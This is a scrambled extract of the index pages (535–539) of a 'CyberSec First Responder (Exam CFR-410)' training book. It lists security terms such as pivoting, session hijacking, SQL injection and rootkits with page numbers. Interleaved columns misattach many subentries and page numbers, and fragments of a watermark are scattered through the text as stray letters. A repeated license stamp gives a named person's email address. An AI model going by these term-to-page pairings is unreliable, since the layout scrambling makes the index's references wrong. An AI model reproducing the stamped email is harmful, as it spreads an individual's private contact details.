NetFlow 276
storage 125
up
NIDS
PCI DSS
network behavior anomaly detection, See
definition of 16
NBAD
penetration test
ot
categories 257
NGFW 289
external 256
NIDS 90
fingerprinting 242
o
NIST
follow-up 263
800 Series Special Publications (SP) 10
D
framework 254
overview 10
internal 256
Privacy Framework 14
overview 238
non-disclosure agreement, See NDA
phases 254
normalization 275, 277
scope 256
NTP reflected attack 162
teams 254
NVD 29
techniques 257
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 535
e
pharming 110
phishing 110, 112, 113, 375 vectors and warnings 145
ut
phlashing 162 reconnaissance
physical controls 25 evasion techniques 90
processes 86
ib
physical evidence storage 444
physical security 409 social engineering in 114
piggybacking 112 tools 90
tr
ping flood attack 161 variables 89
PIPEDA 15 recreational hackers 55
is
pivoting reflected
changing routing tables 198 attacks 131
D
overview 196 DoS attack 162
SSH 197 regex 472
VPN 196 regexp 472
policies
life cycle 38
polymorphic viruses 144
or
Registry compromise 376
Registry Editor 344
regular expressions 472
e
port forwarding 196 remote access services 193
remote file inclusion, See RFI
at
lifecycle 39 risk
processes 346, 363 acceptance 30
Process Explorer 346 avoidance 30
ot
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
536 | CyberSec First Responder® (Exam CFR-410)
e
aggregate CIA scores 27 collection and reporting automation 281
classes of information 23 collection challenges 272
ut
response techniques 30 collection lifecycle 273
RMF 11 collection plan 274
ib
ROE 253 correlation 332
rogue access point 380 overview 272
rogue accounts 189 sources 276
tr
rogue hardware 380 security operations center, See SOC
root cause analysis 403 semi-quantitative analysis 6
is
rootkits separation of duties 41
techniques 187 server-side attacks 131
D
rules of engagement, See ROE service disruption 379
service-level agreement, See SLA
S session
salt 124
sandboxing 350
or fixation 135
hijacking 152, 155
prediction 135
e
sanitization 415 session analysis tools 365
Sarbanes–Oxley Act, See SOX Act
at
SLE 19
security SMiShing 110
best practices 40 SMTP 306
o
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 537
e
spim 111 targets 59
spoofing TCPED 71
ut
IOCs 376 threat actors 54
overview 152 threat profile 62
ib
tools 155 types 78
spyware virtualized environments 173
techniques 145 wireless 168
tr
SQL threat hunting 372
injection attack 132 threat intelligence 71
is
logs 309 threat modeling
SSAE 18 12 approaches 80
D
SSH overview 80
logs 308 tools 82
pivoting 197 Tigerscheme 255
tunnels 123
SSL/TLS 17
SSO 192
tools or
timelines 434
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
538 | CyberSec First Responder® (Exam CFR-410)
e
overview 230
UDDI 136 plans of action 232
ut
UDP flood 161 process 230
unauthorized account usage 381 remediation 233
unauthorized software 373
ib
remediation inhibitors 233
United States Computer Emergency Readiness requirements identification 231
Team, See US-CERT scanning frequency 234
tr
Universal Description, Discovery, and
Integration, See UDDI
W
is
unknown ports 377
unknown protocols 377 WAF
D
update management 408 logs 289
US-CERT 279 solutions 290
WAP 380
V
verification 32
vertical privilege escalation 125
or war driving 88, 257
web application firewall, See WAF
web services 136
e
Web Services Description Language, See
virtualization 173 WSDL
at
WSDL 136
information sources 245
D
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 539
Z
zombies 162
Z shell 323
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D